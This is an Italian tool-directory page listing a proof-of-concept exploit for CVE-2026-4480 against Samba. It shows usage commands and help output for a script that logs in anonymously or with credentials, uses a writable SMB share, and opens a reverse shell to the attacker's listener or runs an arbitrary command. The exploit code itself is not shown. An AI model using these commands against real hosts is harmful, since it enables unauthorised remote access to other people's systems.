Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/vusal777/cve-2026-4480-exploit-poc
Generazione di PayloadAnalisi delle VulnerabilitàExploitPenetration TestingCommand and ControlStrumento di Accesso Remoto
GitHubvusal777/cve-2026-4480-exploit-poc

CVE-2026-4480-exploit-poc

Questo è un exploit poc per CVE-2026-4480

Vedi Repository
12 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Utilizzo:

Per login anonimo:

python3 exploit.py --lhost <listenerhost> --lport <listenerport> -t <target> -N (it is for anonymous login)

Login tramite credenziali:

python3 exploit.py --lhost <listenerhost> --lport <listenerport> -t <target> -u <username> -p <password>

root@kitploit:~
[!] Error: the following arguments are required: -s/--sharename
[*] Note: if user is anonymous and no password, then just add -N without -u or -p

##### Usage:
exploit.py [-h] -t TARGET -Lh LHOST -Lp LPORT -s SHARENAME [-c CMD] (-N | -u USERNAME) [-p PASSWORD]
options:
-h, --help            show this help message and exit
-t, --target TARGET   target Samba host/IP (rhost)
-Lh, --lhost LHOST    your listener IP (e.g. tun0)
-Lp, --lport LPORT    your listener port
-s, --sharename SHARENAME (Writable SMB share / printer name)
-c, --cmd CMD         run a specific shell command instead of a reverse shell
-N, --no-pass         Anonymous / guest login
-u, --username USERNAME (Username for authentication)
-p, --password PASSWORD (Password for authentication)```
Scarica lo strumento